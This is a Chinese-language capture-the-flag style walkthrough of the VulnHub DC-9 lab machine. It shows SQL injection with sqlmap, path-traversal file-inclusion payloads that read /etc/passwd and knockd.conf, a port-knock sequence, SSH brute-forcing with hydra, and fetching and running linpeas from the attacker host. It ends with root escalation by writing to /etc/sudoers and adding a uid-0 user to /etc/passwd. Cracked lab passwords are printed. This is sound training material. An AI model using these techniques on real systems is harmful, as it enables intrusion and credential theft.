【vulnhub】靶机-【DC系列】DC9(附靶机)

admin 2021年1月28日08:22:26评论51 views字数 4267阅读14分13秒阅读模式
【vulnhub】靶机-【DC系列】DC9(附靶机)
喜欢就关注我吧,订阅更多最新消息

出品|MS08067实验室(www.ms08067.com)

本文作者:大方子(Ms08067实验室核心成员)

大方子微信(欢迎骚扰交流):

【vulnhub】靶机-【DC系列】DC9(附靶机)


主机信息

Kali:192.168.56.113

DC9:192.168.56.112

实验过程

先进行主机探测,查找靶机的IP地址:

arp‐scan ‐‐interface eth1 192.168.56.1/24
【vulnhub】靶机-【DC系列】DC9(附靶机)

用nmap对主机进行排查确定,DC9的IP地址为192.168.56.112

可以看到DC开放了80端口以及22端口(被过滤)

nmapsCsVoA dc‐9 192.168.56.112
【vulnhub】靶机-【DC系列】DC9(附靶机)

所以首先从80端口入手,每个网页都点开看看。看到这个搜索页面感觉可以尝试下SQL注入

【vulnhub】靶机-【DC系列】DC9(附靶机)

这里我们用Burp进行尝试,发现的确存在注入点

【vulnhub】靶机-【DC系列】DC9(附靶机)

把请求信息导出为dc9.sqlmap,接下来用SQLmap进行遍历

python3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmap
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后接下来用sqlmap导出数据

python3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmap ‐‐dbs python3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmapD users ‐‐tablespython3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmapD usersT UserDetails ‐‐columnspython3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmapD usersT UserDetailsCusername,password ‐‐dump
【vulnhub】靶机-【DC系列】DC9(附靶机)
python3 sqlmap.pyr C:UsersDFZDesktopdc9.sqlmapD StaffT UsersC Username,Password ‐‐dump
【vulnhub】靶机-【DC系列】DC9(附靶机)

这里SQLmap直接帮我得到admin的密码明文(transorbital1)

管理员账号:admin管理员密码:transorbital1

附在线破解网站:https://hashes.com/en/decrypt/hash

我们将所有的账号,密码进行整理,分别整理到username,password(这里需要注意的是,只要管理员 的密码是需要解密的,其他用户的密码是明文)

【vulnhub】靶机-【DC系列】DC9(附靶机)

用wfuzz进行批量登陆查看页面反应,只有管理员的账号是302 (ps:意料之中)

c:带颜色输出 ‐d:post参数 ‐z:payload ‐m:模式 zip迭代 字典和占位符一一对应进行遍历wfuzz ‐c ‐z file,username ‐z file,password ‐m zip ‐d 'username=FUZZ&password=FUZ2Z' http://192.168.56.112/manage.php
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后我们用管理账号进行登陆

【vulnhub】靶机-【DC系列】DC9(附靶机)

可以看到页面下面出现File does not exist的提示,感觉很有可能就是LFI(本地文件包含)

但是此时我们并不知道参数是多少,这里同样用wfuzz尝试进行遍历(注意这里用把登陆之后的 cookies也要写上,否则网页会提示你要登陆)

查看cookies的话可以浏览器直接查看,也可以让wfuzz把请求发给burp进行查看

#‐p:添加代理wfuzzp 127.0.0.1:8080:HTTP

字典地址:https://github.com/danielmiessler/SecLists

‐b:cookies ‐hw:隐藏指定字节数的结果 ‐w 字典文件wfuzz ‐‐hw 100 ‐b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w /usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt http://192.168.56.112/manage.php?FUZZ=index.php
wfuzz ‐‐hw 100 ‐b 'PHPSESSID=oshc5jht0a15efnue128kdnn9n' ‐c ‐w /usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../etc/passwd
【vulnhub】靶机-【DC系列】DC9(附靶机)

这里我们就找到参数file

【vulnhub】靶机-【DC系列】DC9(附靶机)

然后我们通过**/proc/sched_debug** 来查看Linux系统中任务的调度情况

http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../proc/sched_debug
【vulnhub】靶机-【DC系列】DC9(附靶机)

整理查询发现靶机上运行这knockd

关于knockd的介绍:https://blog.csdn.net/nzjdsds/article/details/112476120

【vulnhub】靶机-【DC系列】DC9(附靶机)

那么我们读取下knockd的配置文件

http://192.168.56.112/manage.php?FUZZ=../../../../../../../../../etc/knockd.conf
【vulnhub】靶机-【DC系列】DC9(附靶机)
options]         UseSyslog[openSSH]         sequence = 7469,8475,9842         seq_timeout = 25         command = /sbin/iptables ‐I INPUT ‐s %IP% ‐p tcp ‐‐dport 22 ‐j ACCEPT         tcpflags = syn  [closeSSH]         sequence = 9842,8475,7469         seq_timeout = 25         command = /sbin/iptables ‐D INPUT ‐s %IP% ‐p tcp ‐‐dport 22 ‐j ACCEPT         tcpflags = syn


这里提供2种敲击方法:nc、nmap

for x in 7469 8475 9842;do nmap ‐Pn ‐‐max‐retries 0 ‐p $x 192.168.56.112;done for x in 7469 8475 9842 22 ;do nc 192.168.56.112 $x;done
【vulnhub】靶机-【DC系列】DC9(附靶机)

此时SSH就可以正常连接,接下来我们用hydra来进行爆破,用户名和密码就是我们先前SQL注入获得的

hydra ‐L username ‐P password ssh://192.168.56.112
【vulnhub】靶机-【DC系列】DC9(附靶机)
[22][ssh] host: 192.168.56.112 login: janitor password: Ilovepeepee [22][ssh] host: 192.168.56.112 login: joeyt password: Passw0rd [22][ssh] host: 192.168.56.112 login: chandlerb password: UrAG0D!

然后我们对这几个账号都尝试进行登陆

ssh janitor@192.168.56.112
【vulnhub】靶机-【DC系列】DC9(附靶机)

只有janitor的家目录存在一个名为.secrets-for-putin的文件夹,并且在其中又得到一些密码

【vulnhub】靶机-【DC系列】DC9(附靶机)

我们把这些密码加入到password文件中

同时我们在janitor使用LinPEAS来探测下可利用的点

下载地址:https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

现在Kali上开启HTTP服务

python3m http.server 80
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后在靶机上进行下载

wget http://192.168.56.114/linpeas.sh
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后运行之后,感觉并没有什么特别的点

bash linpeas.sh
【vulnhub】靶机-【DC系列】DC9(附靶机)

再使用hydra使用刚刚更新过的password文件进行SSH爆破,可以看到多了一个fredf用户

【vulnhub】靶机-【DC系列】DC9(附靶机)
[22][ssh] host: 192.168.56.112 login: fredf password: B4‐Tru3‐001 [22][ssh] host: 192.168.56.112 login: janitor password: Ilovepeepee [22][ssh] host: 192.168.56.112 login: joeyt password: Passw0rd [22][ssh] host: 192.168.56.112 login: chandlerb password: UrAG0D!

然后登陆到fredf账号,查看下fredf的sudo权限,可以看到fredf可以不用密码以root权限执 行/opt/devstuff/dist/test/test的文件

sudo ‐l
【vulnhub】靶机-【DC系列】DC9(附靶机)

/opt/devstuff/dist/test/test是一个可执行文件,执行后出现下面的提示,应该是一个python脚本转化为的可执行的文件

【vulnhub】靶机-【DC系列】DC9(附靶机)

可以在上级目录找到同名的 test.py 然后cat下内容,应该是由这个文件编译过来的

脚本的作用就是将第一个文件的内容附加到另一个文件里面去

【vulnhub】靶机-【DC系列】DC9(附靶机)

这样提权就变得非常简单,这里提供2个提权的思路

提权思路1:往/etc/sudoers里面添加内容,让用户可以以root的权限去执行命令

创建/dev/shm/sudoerAdd,内容如下

joeyt ALL=(ALL) ALL

然后执行

sudo /opt/devstuff/dist/test/test /dev/shm/sudoerAdd /etc/sudoers
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后登陆joeyt,然后切换成root身份,get flag

提权思路2:添加一个新的用户到/etc/passwd,然后新添加的用户登陆

这里用Openssl来对密码进行加密,在进行编辑输入到/tmp/new-passwd

openssl passwd ‐1 ‐salt 123456 dfz
dfz:$1$123456$1VU0YpuL7WOQvLLyYTbbv1:0:0:root:/root:/bin/bash
【vulnhub】靶机-【DC系列】DC9(附靶机)

然后把/tmp/new-passwd写入到/etc/passwd

sudo /opt/devstuff/dist/test/test /tmp/new‐passwd /etc/passwd
【vulnhub】靶机-【DC系列】DC9(附靶机)


靶机下载地址:http://www.five86.com/downloads/DC-9.zip



扫描下方二维码加入星球学习

加入后会邀请你进入内部微信群,内部微信群永久有效!

【vulnhub】靶机-【DC系列】DC9(附靶机) 【vulnhub】靶机-【DC系列】DC9(附靶机)

【vulnhub】靶机-【DC系列】DC9(附靶机)【vulnhub】靶机-【DC系列】DC9(附靶机)

【vulnhub】靶机-【DC系列】DC9(附靶机) 【vulnhub】靶机-【DC系列】DC9(附靶机)

目前35000+人已关注加入我们

【vulnhub】靶机-【DC系列】DC9(附靶机)



本文始发于微信公众号(Ms08067安全实验室):【vulnhub】靶机-【DC系列】DC9(附靶机)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月28日08:22:26
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【vulnhub】靶机-【DC系列】DC9(附靶机)http://cn-sec.com/archives/255674.html

发表评论

匿名网友 填写信息